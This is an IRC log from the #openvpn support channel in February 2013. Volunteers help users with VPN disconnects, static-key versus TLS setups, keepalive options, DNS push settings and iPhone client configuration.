yeah 17:46 < Suterusu> http://pastebin.com/ZbY4ht2U Note, two mins difference (Actually two hrs n four mins, but server is two hrs two mins faster) 17:46 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Quit: Leaving.]
17:46 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 17:47 < pekster> FYI, tcpdump -n is preferred as it doesn't hide port numbers behind silly names 17:47 < Suterusu> Sure I did -npi 17:49 < Suterusu> I seem to git d/c'd every ten-twenty mins, There's nothing 'new' running on here, and I can't spot a commonality concerning d/c's, locally 17:51 < pekster> That warning in the log is curious too if that's your peer's remote IP 17:52 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 17:52 < Suterusu> eh? 17:52 < pekster> The packet length can never be larger than the link can handle, and a length of "17231" wouldn't ever make sense unless you have jumboframe support 17:52 < pekster> Line 2 17:52 < pekster> "WARNING: Bad encapsulated packet length from peer" 17:52 < Suterusu> That IP is nothing t'do with me, I think its an IRC I'm connected to 17:52 < pekster> Oh, must be an interesting port that gets scanned then 17:53 < nsgn2> heck yes. it works. time warner streaming tv over openvpn on an unjailbroken, unmodified iphone 17:55 < pekster> Suterusu: Are you sure about the time difference in your client/server? ie: 'date' shows them off by just 2 minutes (not counting the hours here) 17:55 < pekster> I ask because those logs appear closer to ~7m out of sync 17:55 < pekster> So, the events may not be as related as you think (which is what I'm telling you from an operational perspective too) 17:57 < pekster> Also, remember you'll exclude the traffic you care about if you use a filter like 'host 10.8.0.6' too 17:57 <@krzee> Suterusu, 17:57 <@krzee> !configs 17:57 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn.
or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 17:59 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Quit: Leaving.] 17:59 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 17:59 < Suterusu> Remote time: Mon Feb 25 03:00:04 MSK 2013 17:59 < Suterusu> Local time: Sun 24 Feb 23:58:02 GMT 2013 17:59 < Suterusu> Quite sure 18:05 < pekster> Then those logs are not at all related 18:06 < pekster> tcpdump vs bad packet source 18:06 < pekster> They're out of sync (after accounting for your difference) by at least several minutes 18:06 < Suterusu> Iunno, its what it spits into me terminal 18:09 < Suterusu> So.. I should be looking, say, seven mins earlier in the tcpdump? 18:09 < pekster> Later 18:09 < pekster> ~02:13 !~ ~23:08 18:09 < pekster> 5m difference 18:10 < pekster> I don't even think that's your ultimate problem 18:10 < pekster> Configs, as krzee suggested, will help explain your setup better 18:10 < pekster> There's a reason for the disconnect in the logs, which I still haven't seen 18:10 < pekster> You care about why it disconnected, not the time/IP of a badly sourced packet 18:11 <@krzee> the bad source stuff is likely a red herring 18:12 < Suterusu> I was hoping the time of the packet would help deduce what/why d/c 18:12 < Suterusu> and there isn't a 'later' - The adapter is d/c by that point 18:13 < pekster> server+client configs+logs are vastly more useful 18:14 < pekster> Knowing what sends that bad packet only fixes that problem, not why you're disconnected 18:15 <@krzee> exactly 18:16 -!- max_ [~max@98.225.19.83] has quit [Read error: Connection reset by peer] 18:19 -!- brute11k [~brute11k@89.249.235.210] has quit [Read error: Connection reset by peer] 18:31 < Suterusu> OpenVPN log: http://pastebin.com/hCikgsey 18:31 < Suterusu> OpenVPN server conf: http://pastebin.com/7iKNP0uN 18:31 < Suterusu> Iunno from local config, aint found 
that, I jus use KDE's network manager. any local logs of interest? 18:37 -!- nsgn2 [~nsgn@cpe-24-28-31-68.austin.res.rr.com] has quit [Quit: Leaving] 18:45 -!- JSharpe [~JSharpe@37.220.15.234] has quit [Quit: Leaving] 18:57 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 18:57 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 19:00 -!- mikeybs [~michael@cpe-67-248-128-94.nycap.res.rr.com] has quit [Quit: mikeybs] 19:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 19:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 19:20 <@ecrist> we don't recomment network manager around here 19:20 <@ecrist> we need local client config to help 19:21 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Textual IRC Client: http://www.textualapp.com/] 19:37 -!- p3rror [~mezgani@41.249.131.248] has quit [Ping timeout: 260 seconds] 19:45 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 19:53 < pekster> Suterusu: The TCP socket is being reset, causing the disconnect. This is completely independent of the bad source address message. 
See f.eg, line 51 in the first paste 19:54 < pekster> The client logs would possibly tell you why, but the server is shutting down a connection when the TCP stack tells it the host no longer wishes to communicate any further 20:00 -!- nickmoeck [~nickmoeck@205.185.118.253] has quit [Quit: leaving] 20:13 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 20:23 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 20:29 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 20:33 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 20:38 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 20:42 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 20:51 -!- mikeybs [~michael@cpe-67-248-128-94.nycap.res.rr.com] has joined #openvpn 20:54 -!- mikeybs [~michael@cpe-67-248-128-94.nycap.res.rr.com] has left #openvpn [] 21:18 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 264 seconds] 21:23 -!- uberushaximus [~uberushax@hacked.thegov.us] has quit [Remote host closed the connection] 21:23 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 21:28 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-fzgpavylrsfwposr] has quit [Read error: Operation timed out] 21:28 -!- b00gz_ [~uid6869@gateway/web/irccloud.com/x-kkrfkdubixvsunqu] has joined #openvpn 21:29 -!- uberushaximus [~uberushax@hacked.thegov.us] has quit [Ping timeout: 264 seconds] 21:29 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 21:33 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 21:48 -!- roboman2444 [~roboman24@unaffiliated/roboman2444] has quit [Ping timeout: 248 seconds] 22:19 -!- odoacre [~antonio@us.happylatte.com] has quit [Ping timeout: 255 seconds] 22:19 -!- odoacre [~antonio@us.happylatte.com] has joined #openvpn 22:21 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 22:21 -!- krzee [nobody@hemp.ircpimps.org] 
has quit [Changing host] 22:21 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 22:21 -!- mode/#openvpn [+o krzee] by ChanServ 22:27 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 260 seconds] 22:27 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 260 seconds] 22:44 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 22:45 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 22:48 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 23:04 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection] --- Day changed Mon Feb 25 2013 00:36 -!- corretico [~luis@190.211.93.38] has quit [Remote host closed the connection] 00:38 -!- corretico [~luis@190.211.93.38] has joined #openvpn 01:16 -!- thinkHell [~Hell@85.15.47.27] has joined #openvpn 01:37 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 245 seconds] 01:49 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 02:18 -!- sejo [~SeJo@fosdem/staff/sejo] has joined #openvpn 02:19 < sejo> hey all I have a openvpn tunnel (udp 2 directions) between 2 servers, when trying to add a third server the tunnels fail 02:19 < sejo> is there a guide somewhere on how to do it? 02:29 -!- thinkHell [~Hell@85.15.47.27] has quit [Quit: ["pop()"]] 02:42 < matsh> Why does it fail? 02:45 <@krzee> are you using static keys? 02:46 <@krzee> or maybe re-using certs for the 2 clients? 02:46 <@krzee> ^ sejo 02:54 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 264 seconds] 02:57 < sejo> I use stared key 02:57 < sejo> one for both clients 02:57 < sejo> is that incorrect 02:58 < sejo> do i need a new shared key per client? 
02:59 < sejo> this is the config that works with only 1
02:59 < sejo> http://dpaste.com/992567/
03:00 < sejo> I copied that for the second server and now neither of the two (old and new) will connect
03:00 < sejo> do I need a new tun and a new shared key?
03:06 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn
03:07 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
03:54 -!- dazo_afk is now known as dazo
03:55 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
04:04 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
04:13 -!- zz_AsadH is now known as AsadH
04:28 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Remote host closed the connection]
04:28 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn
04:28 -!- mode/#openvpn [+o plaisthos] by ChanServ
04:33 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection]
04:38 -!- amir [~amir@unaffiliated/amir] has joined #openvpn
05:00 < EugeneKay> If you want >1 relationship, use TLS.
05:00 < EugeneKay> Static Key is extremely limited
05:10 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 245 seconds]
05:13 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn
05:21 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has joined #openvpn
05:37 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Quit: leaving]
05:59 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Quit: Yippee-kay-yay]
06:03 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn
06:15 -!- brute11k [~brute11k@89.249.235.210] has quit [Read error: Connection reset by peer]
06:20 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn
06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds]
06:47 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
07:04 -!- master_of_master [~master_of@p57B525AE.dip.t-dialin.net] has quit [Ping timeout: 276 seconds]
07:06 -!- master_of_master [~master_of@p57B5596B.dip.t-dialin.net] has joined #openvpn
07:25 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn
07:38 -!- ade_b [~Ade@ip-109-46-161-95.web.vodafone.de] has joined #openvpn
07:38 -!- ade_b [~Ade@ip-109-46-161-95.web.vodafone.de] has quit [Changing host]
07:38 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
07:57 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds]
08:15 -!- JSharpe_ [~JSharpe@10-253-3-31-anc.floodtel.net] has joined #openvpn
08:16 -!- JSharpe_ [~JSharpe@10-253-3-31-anc.floodtel.net] has quit [Client Quit]
08:17 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn
08:36 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds]
08:43 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has quit [Ping timeout: 246 seconds]
08:47 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
08:47 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
08:49 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
08:49 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
09:03 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
09:04 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 252 seconds]
09:06 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds]
09:11 -!- dougquaid [~brian@pool-173-72-191-174.clppva.fios.verizon.net] has joined #openvpn
09:16 -!- sqwerty [~sqwerty@nl1.tunnelninja.com] has joined #openvpn
09:16 -!- sqwerty [~sqwerty@nl1.tunnelninja.com] has quit [Changing host]
09:16 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn
09:18 < dougquaid> I've got two openvpn servers, a primary and a backup. Each client has two remotes specified. Ideally the clients would only use the backup if the primary is totally inaccessible, but every so often one client won't be able to reconnect to the primary server on ping-restart, even though the primary server is up. What is a good combo of ping-restart keepalive, etc options to keep this from happening?
09:19 < dougquaid> The clients are all servers, so they should always be connected to the VPN
09:19 < pekster> There really isn't one that will "keep it" from happening as the Internet sometimes loses/drops/delays packets in ways you cannot predict or prevent
09:19 < dougquaid> I was afraid of that
09:20 < pekster> You could write some intelligent code to keep trying a single remote host from your client unless it has several consecutive failures, or set up some smart logic on your server's backends that denies connections on the backup unless the primary is really down
09:20 < pekster> (maybe the backup is also a client of the primary, and if it loses a connection for more than X minutes it starts up)
09:20 < dougquaid> That's an interesting idea
09:21 < pekster> Not a great way to get clients "back" to the primary later, besides disconnecting them
09:21 < dougquaid> My thought of a quick and dirty fix was to specify the primary server 2 or 3 times in the list of remotes, then specify the backup
09:22 < pekster> I'm not sure that works how you expect, and if it did you're just postponing the condition, not preventing it
09:23 < pekster> All depends on the reason for the disconnect and how stable the link is when it comes back
09:26 < dougquaid> I'm not sure of the reason. All I see in my client logs is "UDPv4 link remote: [AF_INET]x.x.x.x:1194" followed by "[UNDEF] Inactivity timeout (--ping-restart), restarting" a minute later
09:28 < pekster> Depends on your keepalive settings, but that means that the client got no openvpn ping (not icmp ping - this one is uni-directional and stateless) for the timeout period
09:29 < pekster> !keepalive
09:29 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive
09:33 < dougquaid> I haven't specified keepalive or ping in the clients. I'll try those and see if it helps. Thanks
09:34 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
09:35 < pekster> dougquaid: That can be pushed from the server. The manpage shows you the exact expansion depending on if you define it on the server or client side
09:39 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
09:42 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Read error: Operation timed out]
09:48 <@plaisthos> on losing connection openvpn will first try to reconnect to the old server and if that fails move to the next one
09:59 -!- sqwerty [~sqwerty@cpc3-aztw22-2-0-cust516.aztw.cable.virginmedia.com] has joined #openvpn
09:59 -!- sqwerty [~sqwerty@cpc3-aztw22-2-0-cust516.aztw.cable.virginmedia.com] has quit [Changing host]
09:59 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn
10:16 -!- dweez [dweez@unaffiliated/dweez] has joined #openvpn
10:25 -!- dweez [dweez@unaffiliated/dweez] has quit [Remote host closed the connection]
10:43 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
10:43 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
10:52 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
10:53 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
10:53 -!- mode/#openvpn [+v s7r] by ChanServ
11:05 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 260 seconds]
11:09 < dougquaid> When I make changes to my server config is it possible to get openvpn to read the new config without restarting the whole service and disconnecting clients? Also, can I force a push of new directives down to the clients?
11:10 < pekster> See the section titled 'SIGNALS' in the manpage: a HUP will re-read the config, but it'll disconnect clients in the process
11:10 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
11:10 < pekster> Clients get new push directives when they reconnect; you can use a --client-connect script to send options to clients dynamically, thus you can edit what's pushed without needing to HUP or restart the service
11:11 -!- nameless` [~nameless@u1c.eu] has left #openvpn []
11:11 < dougquaid> ok, thanks
11:14 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Ping timeout: 260 seconds]
11:15 -!- MorgyN [~mig@178.63.57.253] has quit [Ping timeout: 245 seconds]
11:16 -!- MorgyN [~mig@island.morgyn.org] has joined #openvpn
11:17 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn
11:21 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Remote host closed the connection]
11:22 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Read error: Connection reset by peer]
11:25 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
11:27 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn
11:31 -!- MeanderingCode [~Meanderin@71-213-161-193.albq.qwest.net] has joined #openvpn
11:33 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
11:35 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
11:40 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 252 seconds]
11:41 -!- takamichi [~Takamichi@c101-159.i07-26.onvol.net] has quit [Ping timeout: 276 seconds]
11:42 -!- takamichi [~Takamichi@c101-159.i07-26.onvol.net] has joined #openvpn
11:54 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
11:58 -!- AsadH is now known as zz_AsadH
12:07 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 252 seconds]
12:09 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
12:13 -!- Suterusu1 [~EyeR@host81-152-141-152.range81-152.btcentralplus.com] has joined #openvpn
12:16 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 252 seconds]
12:17 -!- failshell [~failshell@lpr157.lapresse.ca] has joined #openvpn
12:18 < failshell> hello. openvpn is sending my client one domain name for searches as domain example.com in /etc/resolv.conf
12:18 < failshell> i would like to push the option search example.com sub.example.com to /etc/resolv.conf
12:18 < failshell> how do i do that?
12:18 < failshell> can't find it in the doc
12:20 <@dazo> failshell: iirc ... only one search domain can be pushed ... not even sure the DHCP protocol supports multiple search domains
12:20 < pekster> resolv.conf claims to be "limited to six domains with a total of 256 characters"
12:21 -!- Suterusu1 [~EyeR@host81-152-141-152.range81-152.btcentralplus.com] has quit [Ping timeout: 252 seconds]
12:21 < failshell> dazo: it does, it's a standard DHCP option
12:21 < failshell> actually, i think i found it
12:21 < pekster> Pushing multiple options might work, although I'm not sure if the stock Unix-like scripts to peek at that info as pushed from openvpn support it out of the box
12:25 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn
12:34 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
12:34 -!- mode/#openvpn [+v s7r] by ChanServ
12:34 < failshell> turns out i can do it at the client level
12:34 < failshell> easier
12:34 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
12:35 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
12:36 -!- failshell [~failshell@lpr157.lapresse.ca] has quit [Remote host closed the connection]
12:38 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit]
12:46 -!- MeanderingCode [~Meanderin@71-213-161-193.albq.qwest.net] has quit [Remote host closed the connection]
12:52 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 256 seconds]
12:53 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
13:06 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Read error: Operation timed out]
13:13 -!- AlxRogan [~alxrogan@procfail.net] has joined #openvpn
13:14 < AlxRogan> !welcome
13:14 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
13:14 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
13:14 < AlxRogan> !goal
13:14 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
13:16 < AlxRogan> I would like to access the internet over my VPN. I'm running openvpn from ubuntu repo, 2.2.1 with iphone 5 running ios 6.1.2. Trying to use the iphone configuration utility so that I can enable Connect on Demand, but I'm getting certificate errors, which I believe are regarding my ca cert
13:16 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn
13:17 < EugeneKay> Try getting things set up with a laptop first to make sure the server is configured correctly, then port the configuration onto your phone
13:18 < AlxRogan> EugeneKay: definitely an option, I was just hoping someone had run into this specific issue regarding the X509 error before using IPCU. I've seen lots of people using a modified ovpn file with the ca embedded in the file, but that won't work for the IPCU
13:18 < AlxRogan> thanks though
13:18 < EugeneKay> Without logs I have no idea what the specific issue is :-p
13:19 < EugeneKay> "Real" computers are much easier to log/debug, which is why I suggest starting there
13:19 < AlxRogan> what's the best way for me to display them, just paste into channel or something like pastebin?
13:19 < EugeneKay> !paste
13:19 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use
13:20 < AlxRogan> agreed, I definitely am trying the hardest option first...going to step back and go with the itunes method first, if that doesn't do it, then I'll fall back to laptop
13:20 < AlxRogan> http://pastebin.com/9DTW9zY8
13:20 -!- jamesbond-4711 [~jamesbond@unaffiliated/jamesbond-4711] has joined #openvpn
13:20 -!- dazo is now known as dazo_afk
13:20 < AlxRogan> those are the logs from the device; no server logs as it never tries to connect
13:21 < EugeneKay> Yeah, you didn't load the cert right
13:21 < EugeneKay> I don't own any Apple products, so I can't give much in the way of advice for the format that this client is expecting
13:22 < AlxRogan> EugeneKay: gotcha...it seems to be a disconnect between what apple's keychain is allowing and the polarssl library is expecting
13:22 < AlxRogan> and it's very possible it just won't work that way for now
13:23 < AlxRogan> I appreciate the responses though :)
13:25 < jamesbond-4711> hi
13:27 < jamesbond-4711> I need some advice on how to start: I'm considering installing an openVPN server on debian which I would like to use with an iphone as the client (openVPN connect app). Is this the right howto I should follow to set up the server: http://wiki.openvpn.eu/index.php/Config_ServerNET_Routing ?
13:27 <@vpnHelper> Title: Config ServerNET Routing – OpenVPN Wiki (at wiki.openvpn.eu)
13:29 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
13:30 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
13:34 < pekster> jamesbond-4711, you probably want the official howto:
13:34 < pekster> !howto
13:34 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
13:34 < AlxRogan> EugeneKay: just FYI, got it working using the iTunes method, now just tweaking the server side stuff for proxy settings/etc
13:35 -!- vraa__ [~speed_rac@h85.188.213.151.dynamic.ip.windstream.net] has joined #openvpn
13:36 < jamesbond-4711> pekster: wow, that's a lot to read and will keep me busy for some time :-)
13:36 < jamesbond-4711> pekster: anything in particular I should be aware of when I want to use the iphone as the client?
13:37 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds]
13:38 -!- vraa__ [~speed_rac@h85.188.213.151.dynamic.ip.windstream.net] has quit [Client Quit]
13:39 < pekster> I don't have an iDevice so I can't say; your best bet is to get it working on a PC first as a client, then import that config into the iDevice
13:40 < pekster> The integrated setup on the phone makes it hard/impossible to get accurate logs/configs to debug when things go wrong
13:43 < AlxRogan> jamesbond-4711: this helped me out a lot. http://ifkbct.blogspot.com/2013/02/finally-they-did-it-openvpn-on-ipad-and.html
13:43 <@vpnHelper> Title: If Keyboards Could Talk: Finally they did it ! openVPN on iPad and iPhone (at ifkbct.blogspot.com)
13:43 < jamesbond-4711> ic, then I should probably get it working with a linux client
13:45 < jamesbond-4711> AlxRogan: thx - with Google I found dozens of instructions on how to set up Apple clients. But what I am looking for is a tutorial that describes how to set up an openVPN server especially for ios devices as clients (found none so far).
13:46 < AlxRogan> jamesbond-4711: I loosely followed this guide for the server side. http://library.linode.com/networking/openvpn/ubuntu-10.04-lucid#sph_tunnel-all-connections-through-the-vpn
13:46 <@vpnHelper> Title: Secure Communications with OpenVPN on Ubuntu 10.04 (Lucid) – Linode Library (at library.linode.com)
13:47 < jamesbond-4711> AlxRogan: thank you! :-)
13:48 < AlxRogan> jamesbond-4711: np...good luck!
13:53 < pekster> You don't really need to do anything "different" to support iOS vs Windows vs Linux, besides the obvious "get the config to the device" step
13:53 < pekster> openvpn is platform-neutral as a protocol
13:55 < jamesbond-4711> pekster: good to know. As far as I know ios devices, I thought that using ios as the client implies some restrictions on the server setup...
13:56 < pekster> I know android doesn't support tap (at least on non-rooted devices) but I don't really know about iOS
13:56 < pekster> Unless you're doing exotic things you should be fine
13:56 < jamesbond-4711> cool
13:57 < pekster> !iphone
13:57 <@vpnHelper> "iphone" is (#1) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#2) OpenVPN is now available for iOS in the App Store or (#3) https://community.openvpn.net/openvpn/wiki/IOSinline
13:57 < pekster> That link might only apply to iOS 4, so check that key readability thing
13:59 < jamesbond-4711> I guess that should be fixed after 3 years now :)
14:03 < pekster> Well, not until iOS 5
14:03 < pekster> I think
14:03 < pekster> Yay closed-source!
14:10 -!- funjon [jdisher@asano.parad.net] has joined #openvpn
14:10 -!- funjon [jdisher@asano.parad.net] has left #openvpn []
14:12 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
14:19 <@ecrist> pekster: it's not closed source by choice
14:22 < pekster> The security flaw was in iOS, not openvpn. And yes, I understand the openvpn+iOS app deal
14:31 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
14:33 -!- zz_AsadH is now known as AsadH
14:39 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 246 seconds]
14:41 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
14:46 -!- AlxRogan [~alxrogan@procfail.net] has quit [Quit: leaving]
14:47 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 256 seconds]
14:53 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
14:57 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn
15:01 -!- MarKsaitis_ [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
15:02 -!- MarKsaitis_ [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer]
15:02 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
15:08 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit []
15:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 240 seconds]
15:12 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving]
15:12 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
15:12 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
15:37 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
15:37 -!- mode/#openvpn [+o krzee] by ChanServ
15:39 -!- AsadH is now known as zz_AsadH
15:48 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection]
15:54 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
15:54 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
15:56 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
16:12 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 256 seconds]
16:14 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn
16:29 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
16:29 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn
